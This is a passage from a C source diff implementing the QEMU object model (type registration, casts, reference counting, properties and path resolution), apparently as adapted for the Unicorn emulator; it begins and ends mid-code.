g_assert(type->parent_type != NULL); + } + + return type->parent_type; +} + +static bool type_has_parent(TypeImpl *type) +{ + return (type->parent != NULL); +} + +static size_t type_class_get_size(struct uc_struct *uc, TypeImpl *ti) +{ + if (ti->class_size) { + return ti->class_size; + } + + if (type_has_parent(ti)) { + return type_class_get_size(uc, type_get_parent(uc, ti)); + } + + return sizeof(ObjectClass); +} + +static size_t type_object_get_size(struct uc_struct *uc, TypeImpl *ti) +{ + if (ti->instance_size) { + return ti->instance_size; + } + + if (type_has_parent(ti)) { + return type_object_get_size(uc, type_get_parent(uc, ti)); + } + + return 0; +} + +static bool type_is_ancestor(struct uc_struct *uc, TypeImpl *type, TypeImpl *target_type) +{ + assert(target_type); + + /* Check if typename is a direct ancestor of type */ + while (type) { + if (type == target_type) { + return true; + } + + type = type_get_parent(uc, type); + } + + return false; +} + +static void type_initialize(struct uc_struct *uc, TypeImpl *ti); + +static void type_initialize_interface(struct uc_struct *uc, TypeImpl *ti, TypeImpl *interface_type, + TypeImpl *parent_type) +{ + InterfaceClass *new_iface; + TypeInfo info = { 0 }; + TypeImpl *iface_impl; + + info.parent = parent_type->name; + info.name = g_strdup_printf("%s::%s", ti->name, interface_type->name); + info.abstract = true; + + iface_impl = type_new(uc, &info); + iface_impl->parent_type = parent_type; + type_initialize(uc, iface_impl); + g_free((char *)info.name); + + new_iface = (InterfaceClass *)iface_impl->class; + new_iface->concrete_class = ti->class; + new_iface->interface_type = interface_type; + + ti->class->interfaces = g_slist_append(ti->class->interfaces, + iface_impl->class); +} + +static void type_initialize(struct uc_struct *uc, TypeImpl *ti) +{ + TypeImpl *parent; + + if (ti->class) { + return; + } + + ti->class_size = type_class_get_size(uc, ti); + ti->instance_size = type_object_get_size(uc, ti); + + ti->class = g_malloc0(ti->class_size); + + parent = type_get_parent(uc, ti); + if (parent) { + GSList *e; + int i; + type_initialize(uc, parent); + + g_assert(parent->class_size <= ti->class_size); + memcpy(ti->class, parent->class, parent->class_size); + ti->class->interfaces = NULL; + + for (e = parent->class->interfaces; e; e = e->next) { + InterfaceClass *iface = e->data; + ObjectClass *klass = OBJECT_CLASS(iface); + + type_initialize_interface(uc, ti, iface->interface_type, klass->type); + } + + for (i = 0; i < ti->num_interfaces; i++) { + TypeImpl *t = type_get_by_name(uc, ti->interfaces[i].typename); + for (e = ti->class->interfaces; e; e = e->next) { + TypeImpl *target_type = OBJECT_CLASS(e->data)->type; + + if (type_is_ancestor(uc, target_type, t)) { + break; + } + } + + if (e) { + continue; + } + + type_initialize_interface(uc, ti, t, t); + } + } + + ti->class->type = ti; + + while (parent) { + if (parent->class_base_init) { + parent->class_base_init(ti->class, ti->class_data); + } + parent = type_get_parent(uc, parent); + } + + if (ti->class_init) { + ti->class_init(uc, ti->class, ti->class_data); + } +} + +static void object_init_with_type(struct uc_struct *uc, Object *obj, TypeImpl *ti) +{ + if (type_has_parent(ti)) { + object_init_with_type(uc, obj, type_get_parent(uc, ti)); + } + + if (ti->instance_init) { + ti->instance_init(uc, obj, ti->instance_userdata); + } +} + +static void object_post_init_with_type(struct uc_struct *uc, Object *obj, TypeImpl *ti) +{ + if (ti->instance_post_init) { + ti->instance_post_init(uc, obj); + } + + if (type_has_parent(ti)) { + object_post_init_with_type(uc, obj, type_get_parent(uc, ti)); + } +} + +static void object_initialize_with_type(struct uc_struct *uc, void *data, size_t size, TypeImpl *type) +{ + Object *obj = data; + + g_assert(type != NULL); + type_initialize(uc, type); + + g_assert(type->instance_size >= sizeof(Object)); + g_assert(type->abstract == false); + g_assert(size >= type->instance_size); + + memset(obj, 0, type->instance_size); + obj->class_ = type->class; + object_ref(obj); + QTAILQ_INIT(&obj->properties); + object_init_with_type(uc, obj, type); + object_post_init_with_type(uc, obj, type); +} + +void object_initialize(struct uc_struct *uc, void *data, size_t size, const char *typename) +{ + TypeImpl *type = type_get_by_name(uc, typename); + + object_initialize_with_type(uc, data, size, type); +} + +static inline bool object_property_is_child(ObjectProperty *prop) +{ + return strstart(prop->type, "child<", NULL); +} + +static void object_property_del_all(struct uc_struct *uc, Object *obj) +{ + while (!QTAILQ_EMPTY(&obj->properties)) { + ObjectProperty *prop = QTAILQ_FIRST(&obj->properties); + + QTAILQ_REMOVE(&obj->properties, prop, node); + + if (prop->release) { + prop->release(uc, obj, prop->name, prop->opaque); + } + + g_free(prop->name); + g_free(prop->type); + g_free(prop->description); + g_free(prop); + } +} + +void object_property_del_child(struct uc_struct *uc, Object *obj, Object *child, Error **errp) +{ + ObjectProperty *prop; + + QTAILQ_FOREACH(prop, &obj->properties, node) { + if (object_property_is_child(prop) && prop->opaque == child) { + object_property_del(uc, obj, prop->name, errp); + break; + } + } +} + +void object_unparent(struct uc_struct *uc, Object *obj) +{ + if (obj->parent) { + object_property_del_child(uc, obj->parent, obj, NULL); + } +} + +static void object_deinit(struct uc_struct *uc, Object *obj, TypeImpl *type) +{ + if (type->instance_finalize) { + type->instance_finalize(uc, obj, type->instance_userdata); + } + + if (type_has_parent(type)) { + object_deinit(uc, obj, type_get_parent(uc, type)); + } +} + +static void object_finalize(struct uc_struct *uc, void *data) +{ + Object *obj = data; + TypeImpl *ti = obj->class_->type; + + object_property_del_all(uc, obj); + object_deinit(uc, obj, ti); + + g_assert(obj->ref == 0); + if (obj->free) { + obj->free(obj); + } +} + +static Object *object_new_with_type(struct uc_struct *uc, Type type) +{ + Object *obj; + + g_assert(type != NULL); + type_initialize(uc, type); + + obj = g_malloc(type->instance_size); + object_initialize_with_type(uc, obj, type->instance_size, type); + obj->free = g_free; + + return obj; +} + +Object *object_new(struct uc_struct *uc, const char *typename) +{ + TypeImpl *ti = type_get_by_name(uc, typename); + + return object_new_with_type(uc, ti); +} + +Object *object_dynamic_cast(struct uc_struct *uc, Object *obj, const char *typename) +{ + if (obj && object_class_dynamic_cast(uc, object_get_class(obj), typename)) { + return obj; + } + + return NULL; +} + +Object *object_dynamic_cast_assert(struct uc_struct *uc, Object *obj, const char *typename, + const char *file, int line, const char *func) +{ +#ifdef CONFIG_QOM_CAST_DEBUG + int i; + Object *inst; + + for (i = 0; obj && i < OBJECT_CLASS_CAST_CACHE; i++) { + if (obj->class->object_cast_cache[i] == typename) { + goto out; + } + } + + inst = object_dynamic_cast(uc, obj, typename); + + if (!inst && obj) { + fprintf(stderr, "%s:%d:%s: Object %p is not an instance of type %s\n", + file, line, func, obj, typename); + abort(); + } + + assert(obj == inst); + + if (obj && obj == inst) { + for (i = 1; i < OBJECT_CLASS_CAST_CACHE; i++) { + obj->class->object_cast_cache[i - 1] = + obj->class->object_cast_cache[i]; + } + obj->class->object_cast_cache[i - 1] = typename; + } + +out: +#endif + return obj; +} + +ObjectClass *object_class_dynamic_cast(struct uc_struct *uc, ObjectClass *class, + const char *typename) +{ + ObjectClass *ret = NULL; + TypeImpl *target_type; + TypeImpl *type; + + if (!class) { + return NULL; + } + + /* A simple fast path that can trigger a lot for leaf classes. */ + type = class->type; + if (type->name == typename) { + return class; + } + + target_type = type_get_by_name(uc, typename); + if (!target_type) { + /* target class type unknown, so fail the cast */ + return NULL; + } + + if (type->class->interfaces && + type_is_ancestor(uc, target_type, uc->type_interface)) { + int found = 0; + GSList *i; + + for (i = class->interfaces; i; i = i->next) { + ObjectClass *target_class = i->data; + + if (type_is_ancestor(uc, target_class->type, target_type)) { + ret = target_class; + found++; + } + } + + /* The match was ambiguous, don't allow a cast */ + if (found > 1) { + ret = NULL; + } + } else if (type_is_ancestor(uc, type, target_type)) { + ret = class; + } + + return ret; +} + +ObjectClass *object_class_dynamic_cast_assert(struct uc_struct *uc, ObjectClass *class, + const char *typename, + const char *file, int line, + const char *func) +{ + ObjectClass *ret; + +#ifdef CONFIG_QOM_CAST_DEBUG + int i; + + for (i = 0; class && i < OBJECT_CLASS_CAST_CACHE; i++) { + if (class->class_cast_cache[i] == typename) { + ret = class; + goto out; + } + } +#else + if (!class || !class->interfaces) { + return class; + } +#endif + + ret = object_class_dynamic_cast(uc, class, typename); + if (!ret && class) { + fprintf(stderr, "%s:%d:%s: Object %p is not an instance of type %s\n", + file, line, func, class, typename); + abort(); + } + +#ifdef CONFIG_QOM_CAST_DEBUG + if (class && ret == class) { + for (i = 1; i < OBJECT_CLASS_CAST_CACHE; i++) { + class->class_cast_cache[i - 1] = class->class_cast_cache[i]; + } + class->class_cast_cache[i - 1] = typename; + } +out: +#endif + return ret; +} + +const char *object_get_typename(Object *obj) +{ + return obj->class_->type->name; +} + +ObjectClass *object_get_class(Object *obj) +{ + return obj->class_; +} + +bool object_class_is_abstract(ObjectClass *klass) +{ + return klass->type->abstract; +} + +const char *object_class_get_name(ObjectClass *klass) +{ + return klass->type->name; +} + +ObjectClass *object_class_by_name(struct uc_struct *uc, const char *typename) +{ + TypeImpl *type = type_get_by_name(uc, typename); + + if (!type) { + return NULL; + } + + type_initialize(uc, type); + + return type->class; +} + +ObjectClass *object_class_get_parent(struct uc_struct *uc, ObjectClass *class) +{ + TypeImpl *type = type_get_parent(uc, class->type); + + if (!type) { + return NULL; + } + + type_initialize(uc, type); + + return type->class; +} + +typedef struct OCFData +{ + void (*fn)(ObjectClass *klass, void *opaque); + const char *implements_type; + bool include_abstract; + void *opaque; + struct uc_struct *uc; +} OCFData; + +static void object_class_foreach_tramp(gpointer key, gpointer value, + gpointer opaque) +{ + OCFData *data = opaque; + TypeImpl *type = value; + ObjectClass *k; + + type_initialize(data->uc, type); + k = type->class; + + if (!data->include_abstract && type->abstract) { + return; + } + + if (data->implements_type && + !object_class_dynamic_cast(data->uc, k, data->implements_type)) { + return; + } + + data->fn(k, data->opaque); +} + +void object_class_foreach(struct uc_struct *uc, void (*fn)(ObjectClass *klass, void *opaque), + const char *implements_type, bool include_abstract, + void *opaque) +{ + OCFData data = { fn, implements_type, include_abstract, opaque, uc }; + + uc->enumerating_types = true; + g_hash_table_foreach(type_table_get(uc), object_class_foreach_tramp, &data); + uc->enumerating_types = false; +} + +int object_child_foreach(Object *obj, int (*fn)(Object *child, void *opaque), + void *opaque) +{ + ObjectProperty *prop, *next; + int ret = 0; + + QTAILQ_FOREACH_SAFE(prop, &obj->properties, node, next) { + if (object_property_is_child(prop)) { + ret = fn(prop->opaque, opaque); + if (ret != 0) { + break; + } + } + } + return ret; +} + +static void object_class_get_list_tramp(ObjectClass *klass, void *opaque) +{ + GSList **list = opaque; + + *list = g_slist_prepend(*list, klass); +} + +GSList *object_class_get_list(struct uc_struct *uc, const char *implements_type, + bool include_abstract) +{ + GSList *list = NULL; + + object_class_foreach(uc, object_class_get_list_tramp, + implements_type, include_abstract, &list); + return list; +} + +void object_ref(Object *obj) +{ + if (!obj) { + return; + } + atomic_inc(&obj->ref); +} + +void object_unref(struct uc_struct *uc, Object *obj) +{ + if (!obj) { + return; + } + g_assert(obj->ref > 0); + + /* parent always holds a reference to its children */ + if (atomic_fetch_dec(&obj->ref) == 1) { + object_finalize(uc, obj); + } +} + +ObjectProperty * +object_property_add(Object *obj, const char *name, const char *type, + ObjectPropertyAccessor *get, + ObjectPropertySetAccessor *set, + ObjectPropertyRelease *release, + void *opaque, Error **errp) +{ + ObjectProperty *prop; + size_t name_len = strlen(name); + + if (name_len >= 3 && !memcmp(name + name_len - 3, "[*]", 4)) { + int i; + ObjectProperty *ret; + char *name_no_array = g_strdup(name); + + name_no_array[name_len - 3] = '\0'; + for (i = 0; ; ++i) { + char *full_name = g_strdup_printf("%s[%d]", name_no_array, i); + + ret = object_property_add(obj, full_name, type, get, set, + release, opaque, NULL); + g_free(full_name); + if (ret) { + break; + } + } + g_free(name_no_array); + return ret; + } + + QTAILQ_FOREACH(prop, &obj->properties, node) { + if (strcmp(prop->name, name) == 0) { + error_setg(errp, "attempt to add duplicate property '%s'" + " to object (type '%s')", name, + object_get_typename(obj)); + return NULL; + } + } + + prop = g_malloc0(sizeof(*prop)); + + prop->name = g_strdup(name); + prop->type = g_strdup(type); + + prop->get = get; + prop->set = set; + prop->release = release; + prop->opaque = opaque; + + QTAILQ_INSERT_TAIL(&obj->properties, prop, node); + return prop; +} + +ObjectProperty *object_property_find(Object *obj, const char *name, + Error **errp) +{ + ObjectProperty *prop; + + QTAILQ_FOREACH(prop, &obj->properties, node) { + if (strcmp(prop->name, name) == 0) { + return prop; + } + } + + error_setg(errp, "Property '.%s' not found", name); + return NULL; +} + +void object_property_del(struct uc_struct *uc, Object *obj, const char *name, Error **errp) +{ + ObjectProperty *prop = object_property_find(obj, name, errp); + if (prop == NULL) { + return; + } + + if (prop->release) { + prop->release(uc, obj, name, prop->opaque); + } + + QTAILQ_REMOVE(&obj->properties, prop, node); + + g_free(prop->name); + g_free(prop->type); + g_free(prop->description); + g_free(prop); +} + +void object_property_get(struct uc_struct *uc, Object *obj, Visitor *v, const char *name, + Error **errp) +{ + ObjectProperty *prop = object_property_find(obj, name, errp); + if (prop == NULL) { + return; + } + + if (!prop->get) { + error_set(errp, QERR_PERMISSION_DENIED); + } else { + prop->get(uc, obj, v, prop->opaque, name, errp); + } +} + +void object_property_set(struct uc_struct *uc, Object *obj, Visitor *v, const char *name, + Error **errp) +{ + ObjectProperty *prop = object_property_find(obj, name, errp); + if (prop == NULL) { + return; + } + + if (!prop->set) { + error_set(errp, QERR_PERMISSION_DENIED); + } else { + if (prop->set(uc, obj, v, prop->opaque, name, errp)) + error_set(errp, QERR_UNDEFINED_ERROR); + } +} + +void object_property_set_str(struct uc_struct *uc, Object *obj, const char *value, + const char *name, Error **errp) +{ + QString *qstr = qstring_from_str(value); + object_property_set_qobject(uc, obj, QOBJECT(qstr), name, errp); + + QDECREF(qstr); +} + +char *object_property_get_str(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + QObject *ret = object_property_get_qobject(uc, obj, name, errp); + QString *qstring; + char *retval; + + if (!ret) { + return NULL; + } + qstring = qobject_to_qstring(ret); + if (!qstring) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "string"); + retval = NULL; + } else { + retval = g_strdup(qstring_get_str(qstring)); + } + + QDECREF(qstring); + return retval; +} + +void object_property_set_link(struct uc_struct *uc, Object *obj, Object *value, + const char *name, Error **errp) +{ + if (value) { + gchar *path = object_get_canonical_path(value); + object_property_set_str(uc, obj, path, name, errp); + g_free(path); + } else { + object_property_set_str(uc, obj, "", name, errp); + } +} + +Object *object_property_get_link(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + char *str = object_property_get_str(uc, obj, name, errp); + Object *target = NULL; + + if (str && *str) { + target = object_resolve_path(uc, str, NULL); + if (!target) { + error_set(errp, QERR_DEVICE_NOT_FOUND, str); + } + } + + g_free(str); + return target; +} + +void object_property_set_bool(struct uc_struct *uc, Object *obj, bool value, + const char *name, Error **errp) +{ + QBool *qbool = qbool_from_int(value); + object_property_set_qobject(uc, obj, QOBJECT(qbool), name, errp); + + QDECREF(qbool); +} + +bool object_property_get_bool(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + QObject *ret = object_property_get_qobject(uc, obj, name, errp); + QBool *qbool; + bool retval; + + if (!ret) { + return false; + } + qbool = qobject_to_qbool(ret); + if (!qbool) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "boolean"); + retval = false; + } else { + retval = qbool_get_int(qbool); + } + + QDECREF(qbool); + return retval; +} + +void object_property_set_int(struct uc_struct *uc, Object *obj, int64_t value, + const char *name, Error **errp) +{ + QInt *qint = qint_from_int(value); + object_property_set_qobject(uc, obj, QOBJECT(qint), name, errp); + + QDECREF(qint); +} + +int64_t object_property_get_int(struct uc_struct *uc, Object *obj, const char *name, + Error **errp) +{ + QObject *ret = object_property_get_qobject(uc, obj, name, errp); + QInt *qint; + int64_t retval; + + if (!ret) { + return -1; + } + qint = qobject_to_qint(ret); + if (!qint) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, "int"); + retval = -1; + } else { + retval = qint_get_int(qint); + } + + QDECREF(qint); + return retval; +} + +void object_property_parse(struct uc_struct *uc, Object *obj, const char *string, + const char *name, Error **errp) +{ + StringInputVisitor *mi; + mi = string_input_visitor_new(string); + object_property_set(uc, obj, string_input_get_visitor(mi), name, errp); + + string_input_visitor_cleanup(mi); +} + +const char *object_property_get_type(Object *obj, const char *name, Error **errp) +{ + ObjectProperty *prop = object_property_find(obj, name, errp); + if (prop == NULL) { + return NULL; + } + + return prop->type; +} + +Object *object_get_root(struct uc_struct *uc) +{ + if (!uc->root) { + uc->root = object_new(uc, "container"); + } + + return uc->root; +} + +static void object_get_child_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + Object *child = opaque; + gchar *path; + + path = object_get_canonical_path(child); + visit_type_str(v, &path, name, errp); + g_free(path); +} + +static Object *object_resolve_child_property(struct uc_struct *uc, Object *parent, void *opaque, const gchar *part) +{ + return opaque; +} + +static void object_finalize_child_property(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + Object *child = opaque; + + if (child->class_->unparent) { + (child->class_->unparent)(uc, child); + } + child->parent = NULL; + object_unref(uc, child); +} + +void object_property_add_child(Object *obj, const char *name, + Object *child, Error **errp) +{ + Error *local_err = NULL; + gchar *type; + ObjectProperty *op; + + if (child->parent != NULL) { + error_setg(errp, "child object is already parented"); + return; + } + + type = g_strdup_printf("child<%s>", object_get_typename(OBJECT(child))); + + op = object_property_add(obj, name, type, object_get_child_property, NULL, + object_finalize_child_property, child, &local_err); + if (local_err) { + error_propagate(errp, local_err); + goto out; + } + + op->resolve = object_resolve_child_property; + object_ref(child); + child->parent = obj; + +out: + g_free(type); +} + +void object_property_allow_set_link(Object *obj, const char *name, + Object *val, Error **errp) +{ + /* Allow the link to be set, always */ +} + +typedef struct { + Object **child; + void (*check)(Object *, const char *, Object *, Error **); + ObjectPropertyLinkFlags flags; +} LinkProperty; + +static void object_get_link_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + LinkProperty *lprop = opaque; + Object **child = lprop->child; + gchar *path; + + if (*child) { + path = object_get_canonical_path(*child); + visit_type_str(v, &path, name, errp); + g_free(path); + } else { + path = (gchar *)""; + visit_type_str(v, &path, name, errp); + } +} + +/* + * object_resolve_link: + * + * Lookup an object and ensure its type matches the link property type. This + * is similar to object_resolve_path() except type verification against the + * link property is performed. + * + * Returns: The matched object or NULL on path lookup failures. + */ +static Object *object_resolve_link(struct uc_struct *uc, Object *obj, const char *name, + const char *path, Error **errp) +{ + const char *type; + gchar *target_type; + bool ambiguous = false; + Object *target; + + /* Go from link to FOO. */ + type = object_property_get_type(obj, name, NULL); + target_type = g_strndup(&type[5], strlen(type) - 6); + target = object_resolve_path_type(uc, path, target_type, &ambiguous); + + if (ambiguous) { + error_set(errp, ERROR_CLASS_GENERIC_ERROR, + "Path '%s' does not uniquely identify an object", path); + } else if (!target) { + target = object_resolve_path(uc, path, &ambiguous); + if (target || ambiguous) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name, target_type); + } else { + error_set(errp, QERR_DEVICE_NOT_FOUND, path); + } + target = NULL; + } + g_free(target_type); + + return target; +} + +static int object_set_link_property(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + Error *local_err = NULL; + LinkProperty *prop = opaque; + Object **child = prop->child; + Object *old_target = *child; + Object *new_target = NULL; + char *path = NULL; + + visit_type_str(v, &path, name, &local_err); + + if (!local_err && strcmp(path, "") != 0) { + new_target = object_resolve_link(uc, obj, name, path, &local_err); + } + + g_free(path); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + prop->check(obj, name, new_target, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + object_ref(new_target); + *child = new_target; + object_unref(uc, old_target); + + return 0; +} + +static Object *object_resolve_link_property(struct uc_struct *uc, Object *parent, void *opaque, const gchar *part) +{ + LinkProperty *lprop = opaque; + + return *lprop->child; +} + +static void object_release_link_property(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + LinkProperty *prop = opaque; + + if ((prop->flags & OBJ_PROP_LINK_UNREF_ON_RELEASE) && *prop->child) { + object_unref(uc, *prop->child); + } + g_free(prop); +} + +void object_property_add_link(Object *obj, const char *name, + const char *type, Object **child, + void (*check)(Object *, const char *, + Object *, Error **), + ObjectPropertyLinkFlags flags, + Error **errp) +{ + Error *local_err = NULL; + LinkProperty *prop = g_malloc(sizeof(*prop)); + gchar *full_type; + ObjectProperty *op; + + prop->child = child; + prop->check = check; + prop->flags = flags; + + full_type = g_strdup_printf("link<%s>", type); + + op = object_property_add(obj, name, full_type, + object_get_link_property, + check ? object_set_link_property : NULL, + object_release_link_property, + prop, + &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + goto out; + } + + op->resolve = object_resolve_link_property; + +out: + g_free(full_type); +} + +gchar *object_get_canonical_path_component(Object *obj) +{ + ObjectProperty *prop = NULL; + + g_assert(obj); + g_assert(obj->parent != NULL); + + QTAILQ_FOREACH(prop, &obj->parent->properties, node) { + if (!object_property_is_child(prop)) { + continue; + } + + if (prop->opaque == obj) { + return g_strdup(prop->name); + } + } + + /* obj had a parent but was not a child, should never happen */ + g_assert_not_reached(); + return NULL; +} + +gchar *object_get_canonical_path(Object *obj) +{ + Object *root = object_get_root(NULL); + char *newpath, *path = NULL; + + while (obj != root) { + char *component = object_get_canonical_path_component(obj); + + if (path) { + newpath = g_strdup_printf("%s/%s", component, path); + g_free(component); + g_free(path); + path = newpath; + } else { + path = component; + } + + obj = obj->parent; + } + + newpath = g_strdup_printf("/%s", path ? path : ""); + g_free(path); + + return newpath; +} + +Object *object_resolve_path_component(struct uc_struct *uc, Object *parent, const gchar *part) +{ + ObjectProperty *prop = object_property_find(parent, part, NULL); + if (prop == NULL) { + return NULL; + } + + if (prop->resolve) { + return prop->resolve(uc, parent, prop->opaque, part); + } else { + return NULL; + } +} + +static Object *object_resolve_abs_path(struct uc_struct *uc, Object *parent, + gchar **parts, + const char *typename, + int index) +{ + Object *child; + + if (parts[index] == NULL) { + return object_dynamic_cast(uc, parent, typename); + } + + if (strcmp(parts[index], "") == 0) { + return object_resolve_abs_path(uc, parent, parts, typename, index + 1); + } + + child = object_resolve_path_component(uc, parent, parts[index]); + if (!child) { + return NULL; + } + + return object_resolve_abs_path(uc, child, parts, typename, index + 1); +} + +static Object *object_resolve_partial_path(struct uc_struct *uc, Object *parent, + gchar **parts, + const char *typename, + bool *ambiguous) +{ + Object *obj; + ObjectProperty *prop; + + obj = object_resolve_abs_path(uc, parent, parts, typename, 0); + + QTAILQ_FOREACH(prop, &parent->properties, node) { + Object *found; + + if (!object_property_is_child(prop)) { + continue; + } + + found = object_resolve_partial_path(uc, prop->opaque, parts, + typename, ambiguous); + if (found) { + if (obj) { + if (ambiguous) { + *ambiguous = true; + } + return NULL; + } + obj = found; + } + + if (ambiguous && *ambiguous) { + return NULL; + } + } + + return obj; +} + +Object *object_resolve_path_type(struct uc_struct *uc, const char *path, const char *typename, + bool *ambiguous) +{ + Object *obj; + gchar **parts; + + parts = g_strsplit(path, "/", 0); + assert(parts); + + if (parts[0] == NULL || strcmp(parts[0], "") != 0) { + if (ambiguous) { + *ambiguous = false; + } + obj = object_resolve_partial_path(uc, object_get_root(NULL), parts, + typename, ambiguous); + } else { + obj = object_resolve_abs_path(uc, object_get_root(NULL), parts, typename, 1); + } + + g_strfreev(parts); + + return obj; +} + +Object *object_resolve_path(struct uc_struct *uc, const char *path, bool *ambiguous) +{ + return object_resolve_path_type(uc, path, TYPE_OBJECT, ambiguous); +} + +typedef struct StringProperty +{ + char *(*get)(struct uc_struct *uc, Object *, Error **); + int (*set)(struct uc_struct *uc, Object *, const char *, Error **); +} StringProperty; + +static void property_get_str(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + StringProperty *prop = opaque; + char *value; + + value = prop->get(uc, obj, errp); + if (value) { + visit_type_str(v, &value, name, errp); + g_free(value); + } +} + +static int property_set_str(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + StringProperty *prop = opaque; + char *value; + Error *local_err = NULL; + + visit_type_str(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + prop->set(uc, obj, value, errp); + g_free(value); + + return 0; +} + +static void property_release_str(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + StringProperty *prop = opaque; + g_free(prop); +} + +void object_property_add_str(Object *obj, const char *name, + char *(*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, const char *, Error **), + Error **errp) +{ + Error *local_err = NULL; + StringProperty *prop = g_malloc0(sizeof(*prop)); + + prop->get = get; + prop->set = set; + + object_property_add(obj, name, "string", + get ? property_get_str : NULL, + set ? property_set_str : NULL, + property_release_str, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + } +} + +typedef struct BoolProperty +{ + bool (*get)(struct uc_struct *uc, Object *, Error **); + int (*set)(struct uc_struct *uc, Object *, bool, Error **); +} BoolProperty; + +static void property_get_bool(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + BoolProperty *prop = opaque; + bool value; + + value = prop->get(uc, obj, errp); + visit_type_bool(v, &value, name, errp); +} + +static int property_set_bool(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + BoolProperty *prop = opaque; + bool value; + Error *local_err = NULL; + + visit_type_bool(v, &value, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return -1; + } + + return prop->set(uc, obj, value, errp); +} + +static void property_release_bool(struct uc_struct *uc, Object *obj, const char *name, + void *opaque) +{ + BoolProperty *prop = opaque; + g_free(prop); +} + +void object_property_add_bool(struct uc_struct *uc, Object *obj, const char *name, + bool (*get)(struct uc_struct *uc, Object *, Error **), + int (*set)(struct uc_struct *uc, Object *, bool, Error **), + Error **errp) +{ + Error *local_err = NULL; + BoolProperty *prop = g_malloc0(sizeof(*prop)); + + prop->get = get; + prop->set = set; + + object_property_add(obj, name, "bool", + get ? property_get_bool : NULL, + set ? property_set_bool : NULL, + property_release_bool, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + } +} + +static char *qdev_get_type(struct uc_struct *uc, Object *obj, Error **errp) +{ + return g_strdup(object_get_typename(obj)); +} + +static void property_get_uint8_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint8_t value = *(uint8_t *)opaque; + visit_type_uint8(v, &value, name, errp); +} + +static void property_get_uint16_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint16_t value = *(uint16_t *)opaque; + visit_type_uint16(v, &value, name, errp); +} + +static void property_get_uint32_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint32_t value = *(uint32_t *)opaque; + visit_type_uint32(v, &value, name, errp); +} + +static void property_get_uint64_ptr(struct uc_struct *uc, Object *obj, Visitor *v, + void *opaque, const char *name, + Error **errp) +{ + uint64_t value = *(uint64_t *)opaque; + visit_type_uint64(v, &value, name, errp); +} + +void object_property_add_uint8_ptr(Object *obj, const char *name, + const uint8_t *v, Error **errp) +{ + object_property_add(obj, name, "uint8", property_get_uint8_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint16_ptr(Object *obj, const char *name, + const uint16_t *v, Error **errp) +{ + object_property_add(obj, name, "uint16", property_get_uint16_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint32_ptr(Object *obj, const char *name, + const uint32_t *v, Error **errp) +{ + object_property_add(obj, name, "uint32", property_get_uint32_ptr, + NULL, NULL, (void *)v, errp); +} + +void object_property_add_uint64_ptr(Object *obj, const char *name, + const uint64_t *v, Error **errp) +{ + object_property_add(obj, name, "uint64", property_get_uint64_ptr, + NULL, NULL, (void *)v, errp); +} + +typedef struct { + Object *target_obj; + const char *target_name; +} AliasProperty; + +static void property_get_alias(struct uc_struct *uc, Object *obj, struct Visitor *v, void *opaque, + const char *name, Error **errp) +{ + AliasProperty *prop = opaque; + + object_property_get(uc, prop->target_obj, v, prop->target_name, errp); +} + +static int property_set_alias(struct uc_struct *uc, Object *obj, struct Visitor *v, void *opaque, + const char *name, Error **errp) +{ + AliasProperty *prop = opaque; + + object_property_set(uc, prop->target_obj, v, prop->target_name, errp); + + return 0; +} + +static Object *property_resolve_alias(struct uc_struct *uc, Object *obj, void *opaque, + const gchar *part) +{ + AliasProperty *prop = opaque; + + return object_resolve_path_component(uc, prop->target_obj, prop->target_name); +} + +static void property_release_alias(struct uc_struct *uc, Object *obj, const char *name, void *opaque) +{ + AliasProperty *prop = opaque; + + g_free(prop); +} + +void object_property_add_alias(Object *obj, const char *name, + Object *target_obj, const char *target_name, + Error **errp) +{ + AliasProperty *prop; + ObjectProperty *op; + ObjectProperty *target_prop; + gchar *prop_type; + Error *local_err = NULL; + + target_prop = object_property_find(target_obj, target_name, errp); + if (!target_prop) { + return; + } + + if (object_property_is_child(target_prop)) { + prop_type = g_strdup_printf("link%s", + target_prop->type + strlen("child")); + } else { + prop_type = g_strdup(target_prop->type); + } + + prop = g_malloc(sizeof(*prop)); + prop->target_obj = target_obj; + prop->target_name = target_name; + + op = object_property_add(obj, name, prop_type, + property_get_alias, + property_set_alias, + property_release_alias, + prop, &local_err); + if (local_err) { + error_propagate(errp, local_err); + g_free(prop); + goto out; + } + op->resolve = property_resolve_alias; + + object_property_set_description(obj, name, + target_prop->description, + &error_abort); + +out: + g_free(prop_type); +} + +void object_property_set_description(Object *obj, const char *name, + const char *description, Error **errp) +{ + ObjectProperty *op; + + op = 